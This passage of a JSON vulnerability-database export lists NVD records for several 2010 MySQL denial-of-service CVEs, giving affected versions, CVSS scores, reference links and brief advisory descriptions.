"cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.0.21", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.0.77", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:5.0.81", "cpe:/a:mysql:mysql:5.5.5", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.0.11", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.0.89", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.5.2", "cpe:/a:mysql:mysql:5.0.7", "cpe:/a:mysql:mysql:5.5.1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.50", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.25", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:mysql:mysql:5.0.3:beta", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.49:sp1", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.0.22", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.0.85", "cpe:/a:mysql:mysql:5.0.5.0.21", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.0.23", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.0.19", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:mysql:mysql:5.0.10a", "cpe:/a:mysql:mysql:5.0.91", "cpe:/a:mysql:mysql:5.0.52", "cpe:/a:mysql:mysql:5.0.8", "cpe:/a:mysql:mysql:5.0.26", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:mysql:mysql:5.0.14", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.0.87", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.0.51b", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:mysql:mysql:5.0.51", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2010-3838", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3838", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:20:11", "references": ["http://www.vupen.com/english/advisories/2011/0170", "http://dev.mysql.com/doc/refman/5.5/en/news-5-5-6.html", "http://www.ubuntu.com/usn/USN-1397-1", "http://www.redhat.com/support/errata/RHSA-2010-0825.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:222", "https://exchange.xforce.ibmcloud.com/vulnerabilities/64839", "http://www.securityfocus.com/bid/43676", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:223", "http://bugs.mysql.com/bug.php?id=53544", "https://bugzilla.redhat.com/show_bug.cgi?id=640861", "http://www.ubuntu.com/usn/USN-1017-1", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-51.html"], "description": "MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (infinite loop) via multiple invocations of a (1) prepared statement or (2) stored procedure that creates a query with nested JOIN statements.", "edition": 3, "reporter": "NVD", "published": "2011-01-14T14:02:44", "title": "CVE-2010-3839", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:11", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3839"], "scanner": [], "modified": "2018-01-04T21:29:04", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.5.4", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.5.0", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.1.49", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.5.3", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.5.5", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.5.2", "cpe:/a:mysql:mysql:5.5.1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.50", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.49:sp1", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2010-3839", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3839", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:20:10", "references": ["http://www.vupen.com/english/advisories/2011/0170", "http://www.vupen.com/english/advisories/2011/0345", "http://www.securityfocus.com/bid/42599", "http://www.ubuntu.com/usn/USN-1397-1", "http://support.apple.com/kb/HT4723", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-49.html", "http://www.vupen.com/english/advisories/2011/0105", "https://bugzilla.redhat.com/show_bug.cgi?id=628328", "http://www.redhat.com/support/errata/RHSA-2010-0825.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:222", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-92.html", "http://www.debian.org/security/2011/dsa-2143", "http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00006.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2011:012", "https://exchange.xforce.ibmcloud.com/vulnerabilities/64684", "http://bugs.mysql.com/bug.php?id=52711", "http://www.turbolinux.co.jp/security/2011/TLSA-2011-3j.txt", "http://lists.apple.com/archives/security-announce/2011//Jun/msg00000.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:155", "http://www.ubuntu.com/usn/USN-1017-1", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "http://www.vupen.com/english/advisories/2011/0133", "http://www.openwall.com/lists/oss-security/2010/09/28/10"], "description": "Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using EXPLAIN with crafted \"SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...)\" statements, which triggers a NULL pointer dereference in the Item_singlerow_subselect::store function.", "edition": 3, "reporter": "NVD", "published": "2011-01-11T15:00:01", "title": "CVE-2010-3682", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:10", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3682"], "scanner": [], "modified": "2018-01-04T21:29:03", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.0.18", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.0.16a", "cpe:/a:mysql:mysql:5.0.42", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.0.58", "cpe:/a:mysql:mysql:5.0.90", "cpe:/a:mysql:mysql:5.0.1a", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.0.80", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:mysql:mysql:5.0.34", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.0.79", "cpe:/a:mysql:mysql:5.0.87:sp1", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:5.0.33", "cpe:/a:mysql:mysql:5.0.12", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.0.50", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.0.66:a", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:mysql:mysql:5.0.38", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.0.41", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.0.74", "cpe:/a:mysql:mysql:5.0.84", "cpe:/a:mysql:mysql:5.0.17a", "cpe:/a:mysql:mysql:5.0.48", "cpe:/a:mysql:mysql:5.0.37", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.0.15a", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.0.75", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.0.30:sp1", "cpe:/a:mysql:mysql:5.0.88", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.0.13", "cpe:/a:mysql:mysql:5.0.84:sp1", "cpe:/a:mysql:mysql:5.0.83", "cpe:/a:mysql:mysql:5.0.67", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.0.45", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.0.36:sp1", "cpe:/a:mysql:mysql:5.0.74:sp1", "cpe:/a:mysql:mysql:5.0.86", "cpe:/a:mysql:mysql:5.0.72:sp1", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.27", "cpe:/a:mysql:mysql:5.0.70", "cpe:/a:mysql:mysql:5.0.0:alpha", "cpe:/a:mysql:mysql:5.0.82:sp1", "cpe:/a:mysql:mysql:5.0.20a", "cpe:/a:mysql:mysql:5.0.51:b", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.0.54", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.0.21", "cpe:/a:mysql:mysql:5.0.44:sp1", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.0.77", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:5.0.81", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.0.11", "cpe:/a:mysql:mysql:5.0.68", "cpe:/a:mysql:mysql:5.0.64", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.0.89", "cpe:/a:mysql:mysql:5.0.28", "cpe:/a:mysql:mysql:5.0.62", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.0.66:sp1", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:mysql:mysql:5.0.72", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.0.76", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.0.22", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.0.85", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.0.78", "cpe:/a:mysql:mysql:5.0.46", "cpe:/a:mysql:mysql:5.0.19", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:mysql:mysql:5.0.10a", "cpe:/a:mysql:mysql:5.0.56:sp1", "cpe:/a:mysql:mysql:5.0.91", "cpe:/a:mysql:mysql:5.0.52", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:mysql:mysql:5.0.14", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.0.51:a", "cpe:/a:mysql:mysql:5.0.87", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10", "cpe:/a:mysql:mysql:5.0.40"], "id": "CVE-2010-3682", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3682", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:20:10", "references": ["http://www.vupen.com/english/advisories/2011/0170", "http://www.vupen.com/english/advisories/2011/0345", "http://www.ubuntu.com/usn/USN-1397-1", "https://bugzilla.redhat.com/show_bug.cgi?id=628192", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-49.html", "http://www.vupen.com/english/advisories/2011/0105", "http://www.redhat.com/support/errata/RHSA-2010-0825.html", "http://bugs.mysql.com/bug.php?id=54044", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:222", "http://www.debian.org/security/2011/dsa-2143", "http://www.mandriva.com/security/advisories?name=MDVSA-2011:012", "https://exchange.xforce.ibmcloud.com/vulnerabilities/64686", "http://www.securityfocus.com/bid/42598", "http://www.turbolinux.co.jp/security/2011/TLSA-2011-3j.txt", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:155", "http://www.ubuntu.com/usn/USN-1017-1", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "http://www.vupen.com/english/advisories/2011/0133", "http://www.openwall.com/lists/oss-security/2010/09/28/10"], "description": "Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by creating temporary tables with nullable columns while using InnoDB, which triggers an assertion failure.", "edition": 3, "reporter": "NVD", "published": "2011-01-11T15:00:01", "title": "CVE-2010-3680", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:10", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3680"], "scanner": [], "modified": "2018-01-04T21:29:02", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2010-3680", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3680", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:20:11", "references": ["http://www.vupen.com/english/advisories/2011/0170", "http://www.vupen.com/english/advisories/2011/0345", "https://exchange.xforce.ibmcloud.com/vulnerabilities/64841", "http://dev.mysql.com/doc/refman/5.5/en/news-5-5-6.html", "http://www.ubuntu.com/usn/USN-1397-1", "http://support.apple.com/kb/HT4723", "http://bugs.mysql.com/bug.php?id=54476", "http://www.vupen.com/english/advisories/2011/0105", "http://www.redhat.com/support/errata/RHSA-2010-0825.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:222", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-92.html", "http://www.securityfocus.com/bid/43676", "http://www.debian.org/security/2011/dsa-2143", "http://www.turbolinux.co.jp/security/2011/TLSA-2011-3j.txt", "http://lists.apple.com/archives/security-announce/2011//Jun/msg00000.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:223", "http://www.ubuntu.com/usn/USN-1017-1", "https://bugzilla.redhat.com/show_bug.cgi?id=640856", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-51.html"], "description": "MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a prepared statement that uses GROUP_CONCAT with the WITH ROLLUP modifier, probably triggering a use-after-free error when a copied object is modified in a way that also affects the original object.", "edition": 3, "reporter": "NVD", "published": "2011-01-14T14:02:43", "title": "CVE-2010-3837", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:11", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3837"], "scanner": [], "modified": "2018-01-04T21:29:03", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.0.18", "cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.0.16a", "cpe:/a:mysql:mysql:5.0.42", "cpe:/a:mysql:mysql:5.0.24a", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.5.4", "cpe:/a:mysql:mysql:5.0.3a", "cpe:/a:mysql:mysql:5.0.90", "cpe:/a:mysql:mysql:5.0.1a", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:5.0.33", "cpe:/a:mysql:mysql:5.0.12", "cpe:/a:mysql:mysql:5.5.0", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.0.50", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:mysql:mysql:5.0.38", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.0.41", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.0.9", "cpe:/a:mysql:mysql:5.0.22.1.0.1", "cpe:/a:mysql:mysql:5.0.84", "cpe:/a:mysql:mysql:5.0.17a", "cpe:/a:mysql:mysql:5.0.4a", "cpe:/a:mysql:mysql:5.0.37", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.0.15a", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.0.75", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.0.30:sp1", "cpe:/a:mysql:mysql:5.0.0.0", "cpe:/a:mysql:mysql:5.0.88", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:mysql:mysql:5.1.49", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.0.13", "cpe:/a:mysql:mysql:5.0.83", "cpe:/a:mysql:mysql:5.0.67", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.0.45", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.0.6", "cpe:/a:mysql:mysql:5.0.86", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.27", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.0.51a", "cpe:/a:mysql:mysql:5.0.0:alpha", "cpe:/a:mysql:mysql:5.0.20a", "cpe:/a:mysql:mysql:5.5.3", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.0.45b", "cpe:/a:mysql:mysql:5.0.54", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.0.21", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.0.77", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:5.0.81", "cpe:/a:mysql:mysql:5.5.5", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.0.11", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.0.89", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.5.2", "cpe:/a:mysql:mysql:5.0.7", "cpe:/a:mysql:mysql:5.5.1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.50", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.25", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:mysql:mysql:5.0.3:beta", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.49:sp1", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.0.22", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.0.85", "cpe:/a:mysql:mysql:5.0.5.0.21", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.0.23", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.0.19", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:mysql:mysql:5.0.10a", "cpe:/a:mysql:mysql:5.0.91", "cpe:/a:mysql:mysql:5.0.52", "cpe:/a:mysql:mysql:5.0.8", "cpe:/a:mysql:mysql:5.0.26", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:mysql:mysql:5.0.14", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.0.87", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.0.51b", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:mysql:mysql:5.0.51", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2010-3837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3837", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:20:10", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=628698", "http://www.vupen.com/english/advisories/2011/0170", "http://www.ubuntu.com/usn/USN-1397-1", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-49.html", "http://dev.mysql.com/doc/refman/5.5/en/news-5-5-5.html", 